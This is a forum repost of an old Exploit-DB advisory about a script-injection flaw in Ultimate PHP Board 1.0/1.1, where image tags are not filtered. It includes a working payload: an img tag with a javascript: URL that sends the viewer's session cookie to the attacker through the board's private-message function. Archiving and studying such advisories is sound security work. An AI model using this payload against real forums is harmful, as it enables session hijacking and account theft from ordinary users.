Exploit Ultimate PHP Board 1.0/1.1 - Image Tag Script Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
21423
Проверка EDB
  1. Пройдено
Автор
FROG
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
null
Дата публикации
2002-04-25
Код:
source: https://www.securityfocus.com/bid/4603/info

Ultimate PHP Board (UPB) is web forum software. It will run on most Unix and Linux variants, as well as Microsoft Windows operating systems.

Ultimate PHP Board does not filter script code from image tags. This may allow an attacker to include script code in forum messages. Injected script code will be executed in the browser of an arbitrary web user who views the malicious forum message, in the context of the website running UPB.

It may be possible to inject script code into other UPB-Code formatting tags, though this has not been confirmed. 

[ img]javascript:window.open(' index.php?upb=pm&mode=send&send=yes&target_id=SONPROPREID&betreff=cookie&pm=' +document.cookie+ ' &smilies=1&use_upbcode=1&pmbox_id=IDDELAVICTIME&check=yes ')[/img ]
 
Источник
www.exploit-db.com

Похожие темы